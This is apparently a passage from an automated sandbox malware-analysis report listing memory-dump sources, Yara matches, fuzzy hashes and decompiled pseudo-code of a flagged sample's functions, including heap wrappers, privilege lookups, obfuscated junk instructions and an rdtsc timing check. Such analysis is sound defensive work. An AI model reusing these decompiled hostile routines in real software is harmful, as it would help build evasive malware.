                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                              0x004088cb
                                                              0x004088d3
                                                              0x004088d5
                                                              0x004088da
                                                              0x004088df
                                                              0x004088f2
                                                              0x004088f7
                                                              0x00408900
                                                              0x0040890c
                                                              0x0040891f
                                                              0x00408924
                                                              0x00408927
                                                              0x00408930
                                                              0x00408942
                                                              0x00408947
                                                              0x0040894c
                                                              0x00000000
                                                              0x00000000
                                                              0x0040894e
                                                              0x00408952
                                                              0x00000000
                                                              0x00000000
                                                              0x00408954
                                                              0x00000000
                                                              0x00408952
                                                              0x00408956
                                                              0x00408959
                                                              0x0040895f
                                                              0x00408961
                                                              0x0040896c
                                                              0x00408971
                                                              0x00408974
                                                              0x00408981
                                                              0x0040898c
                                                              0x0040898e
                                                              0x00408994
                                                              0x00408998
                                                              0x0040899b
                                                              0x0040899b
                                                              0x004089a2
                                                              0x004089a5
                                                              0x004089aa
                                                              0x004089b7
                                                              0x004088e6
                                                              0x004088e6
                                                              0x004088e6

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                              • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                              • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                              • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                              0x004188b7
                                                              0x004188c2
                                                              0x004188cd
                                                              0x004188d1

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: &5A
                                                              • API String ID: 1279760036-1617645808
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 48%
                                                              			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __edi;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				void* _t20;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B30(_t30, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = E00413E40(_t12, _t20, _t24);
				_t25 = _t13;
				if(_t25 != 0) {
					_push(_t20);
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}
















                                                              0x00407280
                                                              0x0040728f
                                                              0x00407293
                                                              0x0040729e
                                                              0x004072aa
                                                              0x004072ae
                                                              0x004072b3
                                                              0x004072b8
                                                              0x004072ba
                                                              0x004072bc
                                                              0x004072bd
                                                              0x004072be
                                                              0x004072c3
                                                              0x004072ca
                                                              0x004072cc
                                                              0x004072cd
                                                              0x004072da
                                                              0x004072dc
                                                              0x004072de
                                                              0x004072fb
                                                              0x004072fb
                                                              0x00000000
                                                              0x004072fd
                                                              0x00407302

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                              • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                              • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                              • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00418A31, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 44%
                                                              			E00418A31(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t12;

				asm("lds ecx, [esi+0x68]");
				asm("lodsb");
				asm("sbb [edi+ecx*4-0x31], edx");
				asm("lahf");
				_t17 =  *(__eax - 0xe9) * 0x8b553874;
				_t9 = _a4;
				E004191D0(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}




                                                              0x00418a31
                                                              0x00418a34
                                                              0x00418a35
                                                              0x00418a3b
                                                              0x00418a3c
                                                              0x00418a43
                                                              0x00418a5a
                                                              0x00418a70
                                                              0x00418a74

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 904817a693f641618be4d61275ebfff9c4544b176c0127c6cfabfde503dd64b5
                                                              • Instruction ID: a0951bfc263cfa7daba098335b044920feaa6d4bce2c7a3e484e5f7442c6d165
                                                              • Opcode Fuzzy Hash: 904817a693f641618be4d61275ebfff9c4544b176c0127c6cfabfde503dd64b5
                                                              • Instruction Fuzzy Hash: D7F0A0B2240204AFDB14DF54DC84EE77BA9EF88350F018659F949A7250C634E865CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E004188D2(void* __eax, void* __fp0, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t13;
				void* _t18;

				asm("in al, dx");
				_push(0xf06899fb);
				_t10 = _v0;
				_t5 = _t10 + 0xc74; // 0xc74
				E004191D0(_t18, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t13;
			}






                                                              0x004188d2
                                                              0x004188d3
                                                              0x004188e3
                                                              0x004188ef
                                                              0x004188f7
                                                              0x0041890d
                                                              0x00418911

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: e4dd4612c369b0fe6de77d021347657b8659fe979e6f89537cc2ffdf76105970
                                                              • Instruction ID: 4dcc4c4ced3ae352b1eb8cd54aaf07ae5679c31f6a37232146f39f5fbef456e5
                                                              • Opcode Fuzzy Hash: e4dd4612c369b0fe6de77d021347657b8659fe979e6f89537cc2ffdf76105970
                                                              • Instruction Fuzzy Hash: FFE065B5200205ABDB18DF99CC49EA737ACAF88358F164259FD08AB241C630E800CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                              0x004188ef
                                                              0x004188f7
                                                              0x0041890d
                                                              0x00418911

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                              0x00418a5a
                                                              0x00418a70
                                                              0x00418a74

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                              0x00418923
                                                              0x0041893a
                                                              0x00418948

                                                              APIs
                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418948
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 004157F9, Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff5f6ea8f9d5286be0fa523bdbb8ac7889244bfe667bbf848e24d463fadb5b6a
                                                              • Instruction ID: ecf292b78efb5c37a23301c63ee63db3456e338ba391b94020ef8c9ee6cf5a09
                                                              • Opcode Fuzzy Hash: ff5f6ea8f9d5286be0fa523bdbb8ac7889244bfe667bbf848e24d463fadb5b6a
                                                              • Instruction Fuzzy Hash: A5014973D16508DBE320AE59AC52BFBF778CBD2715F0402EBEC4457201E769C8A182D5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AC26F8, Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction ID: 74225f1b926ed813f3523f00cfe4cc92e58d57113e7a9348c90c06ea08c7f1e2
                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction Fuzzy Hash: 63F0C235724159ABDB48EB189DD2F6A33E5EB94300F55C03DED4DC7252E631DD408790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041566A, Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 28%
                                                              			E0041566A(void* __eax, void* __edx, void* __esi) {
				void* _t4;
				void* _t5;
				void* _t13;

				_t4 = _t13;
				asm("sti");
				asm("aaa");
				asm("fstp1 st6");
				asm("rcr edx, cl");
				asm("clc");
				asm("pushfd");
				asm("lodsw");
				_pop(es);
				if (__edx + 1 != 0) goto L1;
				goto L1;
				return _t5;
				L1:
				_t5 =  *((intOrPtr*)(_t4 + 0x5f909090))();
			}






                                                              0x0041566a
                                                              0x0041566c
                                                              0x0041566d
                                                              0x0041566e
                                                              0x00415670
                                                              0x00415672
                                                              0x00415675
                                                              0x00415676
                                                              0x00415678
                                                              0x0041567a
                                                              0x0041567a
                                                              0x00415686
                                                              0x0041567b
                                                              0x0041567b

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07f64aaf9d06d975a785ea5b4079901b9f2bab6e5e0331749f5940e10518355b
                                                              • Instruction ID: 07bfbf4cb8bcce2a5987af884f7e6b1a13094a9162fb3ab47f034020af8629ab
                                                              • Opcode Fuzzy Hash: 07f64aaf9d06d975a785ea5b4079901b9f2bab6e5e0331749f5940e10518355b
                                                              • Instruction Fuzzy Hash: 39D02233E505280AC1040CC8F9000F4F3B0FB87523B1013A3D84C635029220945B0CCA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB10D0, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB0060, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
